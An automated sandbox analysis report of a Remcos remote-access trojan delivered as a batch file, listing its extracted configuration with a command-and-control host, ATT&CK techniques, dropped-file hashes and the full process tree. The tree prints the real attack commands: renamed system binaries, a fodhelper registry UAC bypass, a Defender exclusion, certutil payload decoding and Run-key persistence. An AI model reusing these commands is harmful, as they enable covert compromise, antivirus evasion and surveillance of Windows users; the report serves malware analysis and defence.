remcos | 0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c

Analysis

max time kernel
60s
max time network
59s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
26/04/2024, 16:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c.bat
Size

3.9MB
MD5

8d5ff3734fb8dddaf133ff8ef662aa1d
SHA1

08f0f2978d3c989b0b6ce03a804a6b0cfc0453b6
SHA256

0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c
SHA512

65dadad068eb9d865f622753f4102deabac9306794d3d72aeced54e56c3f6936fc994a40c9725212c834c294911beb6b0fd39a5abb3d3eaff582478e6307a13e
SSDEEP

49152:c0yPIMFC7s8sc5R6AlCpwKwyKI+mI/VqWxNchKlWB/3cx6nyJaKnImlWdgwC1B75:r

Score

10^/10

remcos newremotehost-aprilfile persistence rat

Malware Config

Extracted

Family

remcos

Botnet

NEWRemoteHost-APRILFILE

www.pentegrasystem.com:9231

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-3A6IQD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	xkn.exe

Executes dropped EXE 17 IoCs

pid	Process
2112	alpha.exe
780	alpha.exe
2184	alpha.exe
116	xkn.exe
4620	alpha.exe
1420	ger.exe
2040	alpha.exe
4548	alpha.exe
3188	kn.exe
3412	alpha.exe
440	kn.exe
2732	sppsvc.pif
2720	alpha.exe
2084	alpha.exe
3104	alpha.exe
4784	alpha.exe
4408	alpha.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kpeyvroh = "C:\\Users\\Public\\Kpeyvroh.url"	sppsvc.pif

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	drive.google.com
29	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
4520	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	ger.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
116	xkn.exe
116	xkn.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	116	xkn.exe
Token: SeDebugPrivilege	4520	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2732	sppsvc.pif

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 5020 wrote to memory of 4644	5020	cmd.exe	91
PID 5020 wrote to memory of 4644	5020	cmd.exe	91
PID 5020 wrote to memory of 2112	5020	cmd.exe	92
PID 5020 wrote to memory of 2112	5020	cmd.exe	92
PID 2112 wrote to memory of 548	2112	alpha.exe	93
PID 2112 wrote to memory of 548	2112	alpha.exe	93
PID 5020 wrote to memory of 780	5020	cmd.exe	94
PID 5020 wrote to memory of 780	5020	cmd.exe	94
PID 780 wrote to memory of 3824	780	alpha.exe	95
PID 780 wrote to memory of 3824	780	alpha.exe	95
PID 5020 wrote to memory of 2184	5020	cmd.exe	96
PID 5020 wrote to memory of 2184	5020	cmd.exe	96
PID 2184 wrote to memory of 116	2184	alpha.exe	97
PID 2184 wrote to memory of 116	2184	alpha.exe	97
PID 116 wrote to memory of 4620	116	xkn.exe	98
PID 116 wrote to memory of 4620	116	xkn.exe	98
PID 4620 wrote to memory of 1420	4620	alpha.exe	99
PID 4620 wrote to memory of 1420	4620	alpha.exe	99
PID 116 wrote to memory of 5040	116	xkn.exe	101
PID 116 wrote to memory of 5040	116	xkn.exe	101
PID 5020 wrote to memory of 2040	5020	cmd.exe	102
PID 5020 wrote to memory of 2040	5020	cmd.exe	102
PID 2040 wrote to memory of 4412	2040	alpha.exe	103
PID 2040 wrote to memory of 4412	2040	alpha.exe	103
PID 5020 wrote to memory of 4548	5020	cmd.exe	106
PID 5020 wrote to memory of 4548	5020	cmd.exe	106
PID 4548 wrote to memory of 3188	4548	alpha.exe	107
PID 4548 wrote to memory of 3188	4548	alpha.exe	107
PID 5020 wrote to memory of 3412	5020	cmd.exe	110
PID 5020 wrote to memory of 3412	5020	cmd.exe	110
PID 3412 wrote to memory of 440	3412	alpha.exe	111
PID 3412 wrote to memory of 440	3412	alpha.exe	111
PID 5020 wrote to memory of 2732	5020	cmd.exe	112
PID 5020 wrote to memory of 2732	5020	cmd.exe	112
PID 5020 wrote to memory of 2732	5020	cmd.exe	112
PID 5020 wrote to memory of 2720	5020	cmd.exe	113
PID 5020 wrote to memory of 2720	5020	cmd.exe	113
PID 5020 wrote to memory of 2084	5020	cmd.exe	114
PID 5020 wrote to memory of 2084	5020	cmd.exe	114
PID 5020 wrote to memory of 3104	5020	cmd.exe	115
PID 5020 wrote to memory of 3104	5020	cmd.exe	115
PID 5020 wrote to memory of 4784	5020	cmd.exe	116
PID 5020 wrote to memory of 4784	5020	cmd.exe	116
PID 4784 wrote to memory of 4520	4784	alpha.exe	117
PID 4784 wrote to memory of 4520	4784	alpha.exe	117
PID 5020 wrote to memory of 4408	5020	cmd.exe	120
PID 5020 wrote to memory of 4408	5020	cmd.exe	120
PID 2732 wrote to memory of 2412	2732	sppsvc.pif	127
PID 2732 wrote to memory of 2412	2732	sppsvc.pif	127
PID 2732 wrote to memory of 2412	2732	sppsvc.pif	127

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
  2⤵
  PID:4644
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
    3⤵
    PID:548
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:780
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
    3⤵
    PID:3824
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:116
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4620
    - - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1420
  - - C:\Windows\system32\fodhelper.exe
      "C:\Windows\system32\fodhelper.exe"
      4⤵
      PID:5040
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:4412
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c.bat" "C:\\Users\\Public\\sppsvc.rtf" 9
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4548
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c.bat" "C:\\Users\\Public\\sppsvc.rtf" 9
    3⤵
    - Executes dropped EXE
    PID:3188
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3412
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
    3⤵
    - Executes dropped EXE
    PID:440
- C:\Users\Public\Libraries\sppsvc.pif
  C:\Users\Public\Libraries\sppsvc.pif
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\SysWOW64\extrac32.exe
    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
    3⤵
    PID:2412
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2720
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2084
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3104
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4520
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:4408

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:1884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
1⤵
PID:4468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
f2053a9af41a53caaa5497d6629b46da

SHA1
830ec4f7eda87b73d875a96ec8d3a8cfa941fb71

SHA256
56bf0567f0fb25230bcafe4ce195519009ac9049d550d5853ce063b5af392db5

SHA512
ee7e76a2f87842b8a08a5c1d94ce52652e7c76eb5aa6b99adc24be6f3a08e061497703e006f1dbb82de8b9e4cc3a122ef44da50d48bc075b3db0f1e47dd08ea8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_utelp05k.n3u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\sppsvc.pif

Filesize
1.4MB

MD5
f83153803040cb7382cf1cc8abebd4c7

SHA1
6e87b535356c247834d0112f8846ac6f64d15247

SHA256
35d947955e37f039632ea8da3a00296fa9c8d6c1abe4b62c50d93b976b76c3fb

SHA512
75306ae1e4139e9cdd6cc5aae7cd936e0379f2955d7246d5c05efe1672b45d9a88b61bf143f0c57822711444d706102e14569a897ec2a2b53dadd841c82399ba

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\sppsvc.rtf

Filesize
2.8MB

MD5
0cc78c776371256c0e6488752cedb5ed

SHA1
777a959592a22f66805b0c1b99f518658d75d76e

SHA256
5158c0e055999575bd178961f57409c6c6010658b5493c0577f84143666d5668

SHA512
85fe8796a3f9b286a150986f2d9462c54982c297a9529fd1a58f02fcf355a70f2058d443848a710ae2db5907af05718e64ee9d165503f79a1bcb11033f9be452

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/116-17-0x00000259F7050000-0x00000259F7072000-memory.dmp

Filesize
136KB

Download
memory/2732-57-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2732-63-0x000000001BC50000-0x000000001CC50000-memory.dmp

Filesize
16.0MB

Download
memory/2732-67-0x000000001BC50000-0x000000001CC50000-memory.dmp

Filesize
16.0MB

Download
memory/2732-68-0x000000001BC50000-0x000000001CC50000-memory.dmp

Filesize
16.0MB

Download
memory/2732-69-0x000000001BC50000-0x000000001CC50000-memory.dmp

Filesize
16.0MB

Download
memory/2732-70-0x000000001BC50000-0x000000001CC50000-memory.dmp

Filesize
16.0MB

Download
memory/2732-72-0x000000001BC50000-0x000000001CC50000-memory.dmp

Filesize
16.0MB

Download
memory/2732-66-0x000000001BC50000-0x000000001CC50000-memory.dmp

Filesize
16.0MB

Download
memory/2732-81-0x000000001BC50000-0x000000001CC50000-memory.dmp

Filesize
16.0MB

Download
memory/2732-82-0x000000001BC50000-0x000000001CC50000-memory.dmp

Filesize
16.0MB

Download